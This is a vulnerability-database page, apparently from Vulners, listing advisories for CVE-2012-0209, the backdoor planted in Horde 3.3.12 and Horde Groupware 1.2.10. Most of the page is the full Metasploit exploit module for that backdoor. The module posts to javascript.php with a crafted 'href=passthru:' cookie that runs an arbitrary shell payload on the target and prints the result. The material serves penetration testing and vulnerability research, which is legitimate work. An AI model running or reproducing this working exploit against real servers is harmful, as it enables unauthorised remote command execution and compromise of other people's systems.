Lucene search
Horde 3.3.12 Backdoor Arbitrary PHP Code Execution
🗓️ 16 Feb 2012 09:55:10Reported by Eric Romang, jduck <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 20 Views
Horde 3.3.12 Backdoor Arbitrary PHP Code Execution modul
Show more
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Horde 3.3.12 Backdoor Arbitrary PHP Code Execution | 17 Feb 201200:00 | – | zdt |
 | CVE-2012-0209 | 25 Sep 201222:00 | – | cvelist |
 | DSquare Exploit Pack: D2SEC_HORDE_BACKDOOR | 25 Sep 201222:55 | – | d2 |
 | CVE-2012-0209 | 25 Sep 201200:00 | – | ubuntucve |
 | Horde 3.3.12 Backdoor Arbitrary PHP Code Execution | 1 Jul 201400:00 | – | seebug |
 | CVE-2012-0209 | 25 Sep 201222:55 | – | nvd |
 | Horde Groupware Source Packages Backdoor Vulnerability - Active Check | 16 Feb 201200:00 | – | openvas |
| Horde Groupware Source Packages Backdoor Vulnerability | 16 Feb 201200:00 | – | openvas |
 | Horde RCE | 15 Feb 201200:00 | – | dsquare |
 | CVE-2012-0209 | 25 Sep 201222:55 | – | cve |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Horde 3.3.12 Backdoor Arbitrary PHP Code Execution',
'Description' => %q{
This module exploits an arbitrary PHP code execution vulnerability introduced
as a backdoor into Horde 3.3.12 and Horde Groupware 1.2.10.
},
'Author' => [
'Eric Romang', # first public PoC
'jduck' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-0209'],
[ 'OSVDB', '79246'],
[ 'EDB', '18492'],
[ 'URL', 'http://dev.horde.org/h/jonah/stories/view.php?channel_id=1&id=155' ],
[ 'URL', 'http://eromang.zataz.com/2012/02/15/cve-2012-0209-horde-backdoor-analysis/' ]
],
'Privileged' => false,
'Payload' =>
{
'BadChars' => "\x0a\x0d",
'DisableNops' => true,
'Space' => 4096,
'Compat' =>
{
'PayloadType' => 'cmd',
}
},
'Platform' => %w{ linux unix },
'Arch' => ARCH_CMD,
'DefaultTarget' => 0,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => '2012-02-13'
))
register_options(
[
OptString.new('URI', [true, "Path to Horde installation", "/horde"]),
OptString.new('APP', [true, "App parameter required by javascript.php (must be active)", "horde"]),
])
end
def exploit
# Make sure the URI begins with a slash
uri = datastore['URI']
function = "passthru"
key = Rex::Text.rand_text_alpha(6)
arguments = "echo #{key}`"+payload.raw+"`#{key}"
res = send_request_cgi({
'uri' => normalize_uri(uri, "/services/javascript.php"),
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'data' => "app="+datastore['APP']+"&file=open_calendar.js",
'headers' =>
{
'Cookie' => "href="+function+":"+arguments,
'Connection' => 'Close',
}
}) #default timeout, we don't care about the response
if not res
fail_with(Failure::NotFound, 'The server did not respond to our request')
end
resp = res.body.split(key)
if resp and resp[1]
print_status(resp[1])
else
print_error("No response found")
end
handler
end
end
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo16 Feb 2012 09:10Current
0.4Low risk
Vulners AI Score0.4
CVSS27.5
EPSS0.77689